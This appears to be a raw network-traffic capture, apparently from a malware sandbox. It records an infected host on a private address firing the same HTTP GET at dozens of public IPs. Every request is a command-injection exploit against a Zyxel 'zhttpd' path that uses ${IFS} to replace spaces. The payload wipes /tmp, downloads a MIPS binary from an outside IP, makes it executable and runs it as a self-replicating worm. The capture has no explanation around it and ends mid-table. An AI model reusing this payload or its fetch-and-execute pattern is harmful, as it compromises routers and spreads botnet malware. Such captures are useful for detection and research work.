                                        Mar 31, 2024 09:21:20.906662941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4664192.168.2.235913049.225.70.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906733990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4665192.168.2.2348636167.154.198.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906774998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4666192.168.2.2355202178.96.247.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906810999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4667192.168.2.2343540118.5.102.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906850100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4668192.168.2.2353386178.76.44.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906907082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4669192.168.2.233773227.5.130.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906939030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4670192.168.2.234077041.110.180.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.906979084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4671192.168.2.234828853.70.242.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907022953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4672192.168.2.2334010137.243.54.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907068968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4673192.168.2.234839051.252.162.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907111883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4674192.168.2.2340276150.77.54.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907159090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4675192.168.2.2352548189.227.214.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907192945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4676192.168.2.2358110125.81.223.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907249928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4677192.168.2.234809243.202.218.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907299995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4678192.168.2.2344600116.131.130.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907341003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4679192.168.2.2340658124.134.30.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907387972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4680192.168.2.2333844180.56.134.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907433987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4681192.168.2.2336050196.6.220.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907464981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4682192.168.2.2334830189.200.130.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907510042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4683192.168.2.235919076.6.177.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907565117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4684192.168.2.2333680171.28.190.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907608032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4685192.168.2.233934088.171.10.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907648087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4686192.168.2.236032631.14.56.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907686949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4687192.168.2.2346148208.235.210.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907731056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4688192.168.2.2358766210.157.234.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907773972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4689192.168.2.2344840195.21.59.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907828093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4690192.168.2.2338160209.89.229.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907870054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4691192.168.2.233730881.37.124.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907915115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4692192.168.2.2357480220.115.35.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907943010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4693192.168.2.2355570152.72.234.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.907978058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4694192.168.2.233451284.152.144.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908036947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4695192.168.2.23600185.118.5.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908051968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4696192.168.2.2338184171.237.248.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908094883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4697192.168.2.234658658.44.25.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908145905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4698192.168.2.2355832133.191.74.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908196926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4699192.168.2.2358362144.86.102.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908236980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4700192.168.2.234570281.26.217.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908266068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4701192.168.2.2338310194.47.153.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908309937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4702192.168.2.2355618110.230.247.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908363104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4703192.168.2.233652848.76.128.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908394098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4704192.168.2.2354904153.208.7.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908468962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4705192.168.2.235821275.90.225.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908509970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4706192.168.2.2332804134.93.123.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908562899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4707192.168.2.2354288182.49.108.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908606052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4708192.168.2.2360094210.121.126.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908642054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4709192.168.2.2333796169.144.209.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908725977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4710192.168.2.234908467.195.212.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908771992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4711192.168.2.2352878146.74.217.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908828020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4712192.168.2.2346458158.90.157.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908871889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4713192.168.2.2356912177.199.104.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908901930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4714192.168.2.2343430112.98.205.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908952951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4715192.168.2.2351702211.104.134.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.908993006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4716192.168.2.235325450.172.104.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909051895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4717192.168.2.2357410174.167.54.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909100056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4718192.168.2.2355180108.21.52.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909145117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4719192.168.2.2354132141.5.176.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909183979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4720192.168.2.234558668.27.22.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909219027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4721192.168.2.234768440.31.164.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909264088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4722192.168.2.2349108123.148.67.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909311056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4723192.168.2.2356890107.65.127.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909353018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4724192.168.2.2346484203.96.226.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909409046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4725192.168.2.2355800170.56.52.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909466982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4726192.168.2.2349064122.52.159.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909514904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4727192.168.2.2341742138.195.63.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909554958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4728192.168.2.2351962115.170.55.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909585953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4729192.168.2.234248269.15.94.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909620047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4730192.168.2.235909495.226.39.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:20.909673929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4731192.168.2.234481685.50.189.175443
                                        TimestampBytes transferredDirectionData
